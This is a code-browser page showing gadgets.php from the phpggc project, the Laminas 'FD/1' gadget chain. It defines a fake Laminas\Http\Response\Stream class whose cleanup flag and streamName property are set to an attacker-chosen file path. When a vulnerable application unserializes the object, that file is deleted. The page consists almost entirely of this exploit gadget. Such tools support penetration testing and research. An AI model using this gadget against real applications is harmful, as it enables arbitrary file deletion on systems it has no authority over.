Codebase list phpggc / 9a88393 gadgetchains / Laminas / FD / 1 / gadgets.php
9a88393

Tree @9a88393 (Download .tar.gz)

gadgets.php @9a88393raw · history · blame

1
2
3
4
5
6
7
8
9
<?php
namespace Laminas\Http\Response {
    class Stream {
        function __construct($remote_file) {
            $this->cleanup = '1';
            $this->streamName = $remote_file;
        }
    }
}